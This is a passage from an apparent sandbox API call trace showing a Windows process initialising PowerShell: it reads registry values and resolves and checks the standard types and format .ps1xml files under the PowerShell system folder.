	[0149.386] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.386] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.386] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.386] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.894] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.894] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.899] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.899] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.900] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.900] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.900] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.900] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.901] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.901] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1000, lpOverlapped=0x0) returned 1
	[0149.901] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x1b4, lpOverlapped=0x0) returned 1
	[0149.901] ReadFile (in: hFile=0x32c, lpBuffer=0x2c518f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd398, lpOverlapped=0x0 | out: lpBuffer=0x2c518f0*, lpNumberOfBytesRead=0xbd398*=0x0, lpOverlapped=0x0) returned 1
	[0149.901] CloseHandle (hObject=0x32c) returned 1
	[0149.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xbd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.902] SetErrorMode (uMode=0x1) returned 0x1
	[0149.902] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd310 | out: lpFileInformation=0xbd310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0149.902] SetErrorMode (uMode=0x1) returned 0x1
	[0149.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xbd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.902] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd3f8 | out: phkResult=0xbd3f8*=0x32c) returned 0x0
	[0149.902] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd37c, lpData=0x0, lpcbData=0xbd378*=0x0 | out: lpType=0xbd37c*=0x1, lpData=0x0, lpcbData=0xbd378*=0x56) returned 0x0
	[0149.902] CoTaskMemAlloc (cb=0x5a) returned 0x399b70
	[0149.902] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd34c, lpData=0x399b70, lpcbData=0xbd348*=0x56 | out: lpType=0xbd34c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xbd348*=0x56) returned 0x0
	[0149.902] CoTaskMemFree (pv=0x399b70) 
	[0149.902] RegCloseKey (hKey=0x32c) returned 0x0
	[0149.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xbd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xbcef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0154.440] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0155.733] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.293] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.294] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.295] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.296] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.297] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.906] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.936] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.947] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.948] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.952] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.654] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.655] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.657] VirtualQuery (in: lpAddress=0xbc0e0, lpBuffer=0xbcfa0, dwLength=0x30 | out: lpBuffer=0xbcfa0*(BaseAddress=0xbc000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.662] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0159.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.662] CoTaskMemFree (pv=0x2e4430) 
	[0159.853] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd598 | out: phkResult=0xbd598*=0x31c) returned 0x0
	[0159.853] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0xbd5ac, lpData=0x0, lpcbData=0xbd5a8*=0x0 | out: lpType=0xbd5ac*=0x1, lpData=0x0, lpcbData=0xbd5a8*=0x74) returned 0x0
	[0159.853] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0xbd51c, lpData=0x0, lpcbData=0xbd518*=0x0 | out: lpType=0xbd51c*=0x1, lpData=0x0, lpcbData=0xbd518*=0x74) returned 0x0
	[0159.853] CoTaskMemAlloc (cb=0x78) returned 0x32be90
	[0159.853] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0xbd4ec, lpData=0x32be90, lpcbData=0xbd4e8*=0x74 | out: lpType=0xbd4ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xbd4e8*=0x74) returned 0x0
	[0159.853] CoTaskMemFree (pv=0x32be90) 
	[0159.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0159.853] SetErrorMode (uMode=0x1) returned 0x1
	[0159.854] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0159.854] SetErrorMode (uMode=0x1) returned 0x1
	[0159.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.855] SetErrorMode (uMode=0x1) returned 0x1
	[0159.855] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0159.910] SetErrorMode (uMode=0x1) returned 0x1
	[0159.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.910] SetErrorMode (uMode=0x1) returned 0x1
	[0159.910] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0159.910] SetErrorMode (uMode=0x1) returned 0x1
	[0159.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.911] SetErrorMode (uMode=0x1) returned 0x1
	[0159.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0159.911] SetErrorMode (uMode=0x1) returned 0x1
	[0159.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.911] SetErrorMode (uMode=0x1) returned 0x1
	[0159.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0159.911] SetErrorMode (uMode=0x1) returned 0x1
	[0159.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0159.911] SetErrorMode (uMode=0x1) returned 0x1
	[0159.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0159.911] SetErrorMode (uMode=0x1) returned 0x1
	[0159.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0159.912] SetErrorMode (uMode=0x1) returned 0x1
	[0159.912] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0159.912] SetErrorMode (uMode=0x1) returned 0x1
	[0159.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0159.912] SetErrorMode (uMode=0x1) returned 0x1
	[0159.912] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0159.912] SetErrorMode (uMode=0x1) returned 0x1
	[0159.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0159.912] SetErrorMode (uMode=0x1) returned 0x1
	[0159.912] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0159.912] SetErrorMode (uMode=0x1) returned 0x1
	[0159.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0159.912] SetErrorMode (uMode=0x1) returned 0x1
	[0159.913] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd470 | out: lpFileInformation=0xbd470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0159.913] SetErrorMode (uMode=0x1) returned 0x1
	[0159.914] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0159.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.914] CoTaskMemFree (pv=0x2e4430) 
	[0159.925] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0159.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.925] CoTaskMemFree (pv=0x2e4430) 
	[0159.926] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0159.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.926] CoTaskMemFree (pv=0x2e4430) 
	[0159.928] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0159.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.928] CoTaskMemFree (pv=0x2e4430) 
	[0159.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.929] SetErrorMode (uMode=0x1) returned 0x1
	[0159.985] ReadFile (in: hFile=0x320, lpBuffer=0x32fbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x32fbba0*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.001] ReadFile (in: hFile=0x320, lpBuffer=0x32fbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x32fbba0*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.020] ReadFile (in: hFile=0x320, lpBuffer=0x32fbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x32fbba0*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.037] ReadFile (in: hFile=0x320, lpBuffer=0x32fbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x32fbba0*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.056] ReadFile (in: hFile=0x320, lpBuffer=0x32fbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x32fbba0*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
